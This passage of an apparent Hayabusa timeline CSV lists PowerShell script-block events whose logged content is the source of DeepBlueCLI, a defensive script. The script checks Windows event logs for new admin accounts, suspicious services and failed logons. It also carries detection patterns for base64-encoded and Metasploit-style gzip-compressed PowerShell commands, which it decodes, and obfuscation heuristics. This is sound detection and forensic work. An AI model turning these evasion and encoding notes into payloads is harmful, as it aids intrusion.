$servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.536 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.536 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.536 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. 
# I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.539 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.545 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, 
check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:22:37.547 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not 
reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:23:59.512 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? 
"","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:23:59.512 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:23:59.513 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. 
Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:23:59.514 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local 
